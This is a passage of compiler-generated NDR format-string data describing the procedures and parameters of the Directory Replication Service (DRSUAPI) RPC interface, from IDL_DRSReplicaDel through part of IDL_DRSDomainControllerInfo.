/* 306 */	0xa,		/* 10 */
			0x45,		/* Ext Flags:  new corr desc, srv corr check, has range on conformance */
/* 308 */	NdrFcShort( 0x0 ),	/* 0 */
/* 310 */	NdrFcShort( 0x1 ),	/* 1 */
/* 312 */	NdrFcShort( 0x0 ),	/* 0 */
/* 314 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 316 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 318 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 320 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwVersion */

/* 322 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 324 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 326 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgAdd */

/* 328 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 330 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 332 */	NdrFcShort( 0x712 ),	/* Type Offset=1810 */

	/* Return value */

/* 334 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 336 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 338 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSReplicaDel */

/* 340 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 342 */	NdrFcLong( 0x0 ),	/* 0 */
/* 346 */	NdrFcShort( 0x6 ),	/* 6 */
/* 348 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 350 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 352 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 354 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 356 */	NdrFcShort( 0x2c ),	/* 44 */
/* 358 */	NdrFcShort( 0x8 ),	/* 8 */
/* 360 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
			0x4,		/* 4 */
/* 362 */	0xa,		/* 10 */
			0x45,		/* Ext Flags:  new corr desc, srv corr check, has range on conformance */
/* 364 */	NdrFcShort( 0x0 ),	/* 0 */
/* 366 */	NdrFcShort( 0x1 ),	/* 1 */
/* 368 */	NdrFcShort( 0x0 ),	/* 0 */
/* 370 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 372 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 374 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 376 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwVersion */

/* 378 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 380 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 382 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgDel */

/* 384 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 386 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 388 */	NdrFcShort( 0x7b8 ),	/* Type Offset=1976 */

	/* Return value */

/* 390 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 392 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 394 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSReplicaModify */

/* 396 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 398 */	NdrFcLong( 0x0 ),	/* 0 */
/* 402 */	NdrFcShort( 0x7 ),	/* 7 */
/* 404 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 406 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 408 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 410 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 412 */	NdrFcShort( 0x2c ),	/* 44 */
/* 414 */	NdrFcShort( 0x8 ),	/* 8 */
/* 416 */	0x46,		/* Oi2 Flags:  clt must size, has return, has ext, */
			0x4,		/* 4 */
/* 418 */	0xa,		/* 10 */
			0x45,		/* Ext Flags:  new corr desc, srv corr check, has range on conformance */
/* 420 */	NdrFcShort( 0x0 ),	/* 0 */
/* 422 */	NdrFcShort( 0x1 ),	/* 1 */
/* 424 */	NdrFcShort( 0x0 ),	/* 0 */
/* 426 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 428 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 430 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 432 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwVersion */

/* 434 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 436 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 438 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgMod */

/* 440 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 442 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 444 */	NdrFcShort( 0x7f2 ),	/* Type Offset=2034 */

	/* Return value */

/* 446 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 448 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 450 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSVerifyNames */

/* 452 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 454 */	NdrFcLong( 0x0 ),	/* 0 */
/* 458 */	NdrFcShort( 0x8 ),	/* 8 */
/* 460 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 462 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 464 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 466 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 468 */	NdrFcShort( 0x2c ),	/* 44 */
/* 470 */	NdrFcShort( 0x24 ),	/* 36 */
/* 472 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 474 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 476 */	NdrFcShort( 0x1 ),	/* 1 */
/* 478 */	NdrFcShort( 0x1 ),	/* 1 */
/* 480 */	NdrFcShort( 0x0 ),	/* 0 */
/* 482 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 484 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 486 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 488 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 490 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 492 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 494 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 496 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 498 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 500 */	NdrFcShort( 0x834 ),	/* Type Offset=2100 */

	/* Parameter pdwOutVersion */

/* 502 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 504 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 506 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 508 */	NdrFcShort( 0x8113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=32 */
/* 510 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 512 */	NdrFcShort( 0x89a ),	/* Type Offset=2202 */

	/* Return value */

/* 514 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 516 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 518 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSGetMemberships */

/* 520 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 522 */	NdrFcLong( 0x0 ),	/* 0 */
/* 526 */	NdrFcShort( 0x9 ),	/* 9 */
/* 528 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 530 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 532 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 534 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 536 */	NdrFcShort( 0x2c ),	/* 44 */
/* 538 */	NdrFcShort( 0x24 ),	/* 36 */
/* 540 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 542 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 544 */	NdrFcShort( 0x1 ),	/* 1 */
/* 546 */	NdrFcShort( 0x1 ),	/* 1 */
/* 548 */	NdrFcShort( 0x0 ),	/* 0 */
/* 550 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 552 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 554 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 556 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 558 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 560 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 562 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 564 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 566 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 568 */	NdrFcShort( 0x8fc ),	/* Type Offset=2300 */

	/* Parameter pdwOutVersion */

/* 570 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 572 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 574 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 576 */	NdrFcShort( 0xa113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=40 */
/* 578 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 580 */	NdrFcShort( 0x96e ),	/* Type Offset=2414 */

	/* Return value */

/* 582 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 584 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 586 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSInterDomainMove */

/* 588 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 590 */	NdrFcLong( 0x0 ),	/* 0 */
/* 594 */	NdrFcShort( 0xa ),	/* 10 */
/* 596 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 598 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 600 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 602 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 604 */	NdrFcShort( 0x2c ),	/* 44 */
/* 606 */	NdrFcShort( 0x24 ),	/* 36 */
/* 608 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 610 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 612 */	NdrFcShort( 0x1 ),	/* 1 */
/* 614 */	NdrFcShort( 0x1 ),	/* 1 */
/* 616 */	NdrFcShort( 0x0 ),	/* 0 */
/* 618 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 620 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 622 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 624 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 626 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 628 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 630 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 632 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 634 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 636 */	NdrFcShort( 0xa18 ),	/* Type Offset=2584 */

	/* Parameter pdwOutVersion */

/* 638 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 640 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 642 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 644 */	NdrFcShort( 0x8113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=32 */
/* 646 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 648 */	NdrFcShort( 0xad2 ),	/* Type Offset=2770 */

	/* Return value */

/* 650 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 652 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 654 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSGetNT4ChangeLog */

/* 656 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 658 */	NdrFcLong( 0x0 ),	/* 0 */
/* 662 */	NdrFcShort( 0xb ),	/* 11 */
/* 664 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 666 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 668 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 670 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 672 */	NdrFcShort( 0x2c ),	/* 44 */
/* 674 */	NdrFcShort( 0x24 ),	/* 36 */
/* 676 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 678 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 680 */	NdrFcShort( 0x1 ),	/* 1 */
/* 682 */	NdrFcShort( 0x1 ),	/* 1 */
/* 684 */	NdrFcShort( 0x0 ),	/* 0 */
/* 686 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 688 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 690 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 692 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 694 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 696 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 698 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 700 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 702 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 704 */	NdrFcShort( 0xb28 ),	/* Type Offset=2856 */

	/* Parameter pdwOutVersion */

/* 706 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 708 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 710 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 712 */	NdrFcShort( 0x113 ),	/* Flags:  must size, must free, out, simple ref, */
/* 714 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 716 */	NdrFcShort( 0xb74 ),	/* Type Offset=2932 */

	/* Return value */

/* 718 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 720 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 722 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSCrackNames */

/* 724 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 726 */	NdrFcLong( 0x0 ),	/* 0 */
/* 730 */	NdrFcShort( 0xc ),	/* 12 */
/* 732 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 734 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 736 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 738 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 740 */	NdrFcShort( 0x2c ),	/* 44 */
/* 742 */	NdrFcShort( 0x24 ),	/* 36 */
/* 744 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 746 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 748 */	NdrFcShort( 0x1 ),	/* 1 */
/* 750 */	NdrFcShort( 0x1 ),	/* 1 */
/* 752 */	NdrFcShort( 0x0 ),	/* 0 */
/* 754 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 756 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 758 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 760 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 762 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 764 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 766 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 768 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 770 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 772 */	NdrFcShort( 0xbfe ),	/* Type Offset=3070 */

	/* Parameter pdwOutVersion */

/* 774 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 776 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 778 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 780 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 782 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 784 */	NdrFcShort( 0xc60 ),	/* Type Offset=3168 */

	/* Return value */

/* 786 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 788 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 790 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSWriteSPN */

/* 792 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 794 */	NdrFcLong( 0x0 ),	/* 0 */
/* 798 */	NdrFcShort( 0xd ),	/* 13 */
/* 800 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 802 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 804 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 806 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 808 */	NdrFcShort( 0x2c ),	/* 44 */
/* 810 */	NdrFcShort( 0x24 ),	/* 36 */
/* 812 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 814 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 816 */	NdrFcShort( 0x1 ),	/* 1 */
/* 818 */	NdrFcShort( 0x1 ),	/* 1 */
/* 820 */	NdrFcShort( 0x0 ),	/* 0 */
/* 822 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 824 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 826 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 828 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 830 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 832 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 834 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 836 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 838 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 840 */	NdrFcShort( 0xce2 ),	/* Type Offset=3298 */

	/* Parameter pdwOutVersion */

/* 842 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 844 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 846 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 848 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 850 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 852 */	NdrFcShort( 0xd48 ),	/* Type Offset=3400 */

	/* Return value */

/* 854 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 856 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 858 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSRemoveDsServer */

/* 860 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 862 */	NdrFcLong( 0x0 ),	/* 0 */
/* 866 */	NdrFcShort( 0xe ),	/* 14 */
/* 868 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 870 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 872 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 874 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 876 */	NdrFcShort( 0x2c ),	/* 44 */
/* 878 */	NdrFcShort( 0x24 ),	/* 36 */
/* 880 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 882 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 884 */	NdrFcShort( 0x1 ),	/* 1 */
/* 886 */	NdrFcShort( 0x1 ),	/* 1 */
/* 888 */	NdrFcShort( 0x0 ),	/* 0 */
/* 890 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 892 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 894 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 896 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 898 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 900 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 902 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 904 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 906 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 908 */	NdrFcShort( 0xd72 ),	/* Type Offset=3442 */

	/* Parameter pdwOutVersion */

/* 910 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 912 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 914 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 916 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 918 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 920 */	NdrFcShort( 0xdac ),	/* Type Offset=3500 */

	/* Return value */

/* 922 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 924 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 926 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSRemoveDsDomain */

/* 928 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 930 */	NdrFcLong( 0x0 ),	/* 0 */
/* 934 */	NdrFcShort( 0xf ),	/* 15 */
/* 936 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 938 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 940 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 942 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 944 */	NdrFcShort( 0x2c ),	/* 44 */
/* 946 */	NdrFcShort( 0x24 ),	/* 36 */
/* 948 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 950 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 952 */	NdrFcShort( 0x1 ),	/* 1 */
/* 954 */	NdrFcShort( 0x1 ),	/* 1 */
/* 956 */	NdrFcShort( 0x0 ),	/* 0 */
/* 958 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 960 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 962 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 964 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 966 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 968 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 970 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 972 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 974 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 976 */	NdrFcShort( 0xdd0 ),	/* Type Offset=3536 */

	/* Parameter pdwOutVersion */

/* 978 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
/* 980 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 982 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgOut */

/* 984 */	NdrFcShort( 0x2113 ),	/* Flags:  must size, must free, out, simple ref, srv alloc size=8 */
/* 986 */	NdrFcShort( 0x20 ),	/* x86 Stack size/offset = 32 */
/* 988 */	NdrFcShort( 0xe02 ),	/* Type Offset=3586 */

	/* Return value */

/* 990 */	NdrFcShort( 0x70 ),	/* Flags:  out, return, base type, */
/* 992 */	NdrFcShort( 0x28 ),	/* x86 Stack size/offset = 40 */
/* 994 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Procedure IDL_DRSDomainControllerInfo */

/* 996 */	0x0,		/* 0 */
			0x48,		/* Old Flags:  */
/* 998 */	NdrFcLong( 0x0 ),	/* 0 */
/* 1002 */	NdrFcShort( 0x10 ),	/* 16 */
/* 1004 */	NdrFcShort( 0x30 ),	/* x86 Stack size/offset = 48 */
/* 1006 */	0x30,		/* FC_BIND_CONTEXT */
			0x40,		/* Ctxt flags:  in, */
/* 1008 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1010 */	0x0,		/* 0 */
			0x0,		/* 0 */
/* 1012 */	NdrFcShort( 0x2c ),	/* 44 */
/* 1014 */	NdrFcShort( 0x24 ),	/* 36 */
/* 1016 */	0x47,		/* Oi2 Flags:  srv must size, clt must size, has return, has ext, */
			0x6,		/* 6 */
/* 1018 */	0xa,		/* 10 */
			0x47,		/* Ext Flags:  new corr desc, clt corr check, srv corr check, has range on conformance */
/* 1020 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1022 */	NdrFcShort( 0x1 ),	/* 1 */
/* 1024 */	NdrFcShort( 0x0 ),	/* 0 */
/* 1026 */	NdrFcShort( 0x0 ),	/* 0 */

	/* Parameter hDrs */

/* 1028 */	NdrFcShort( 0x8 ),	/* Flags:  in, */
/* 1030 */	NdrFcShort( 0x0 ),	/* x86 Stack size/offset = 0 */
/* 1032 */	NdrFcShort( 0x4e ),	/* Type Offset=78 */

	/* Parameter dwInVersion */

/* 1034 */	NdrFcShort( 0x48 ),	/* Flags:  in, base type, */
/* 1036 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 1038 */	0x8,		/* FC_LONG */
			0x0,		/* 0 */

	/* Parameter pmsgIn */

/* 1040 */	NdrFcShort( 0x10b ),	/* Flags:  must size, must free, in, simple ref, */
/* 1042 */	NdrFcShort( 0x10 ),	/* x86 Stack size/offset = 16 */
/* 1044 */	NdrFcShort( 0xe26 ),	/* Type Offset=3622 */

	/* Parameter pdwOutVersion */

/* 1046 */	NdrFcShort( 0x2150 ),	/* Flags:  out, base type, simple ref, srv alloc size=8 */
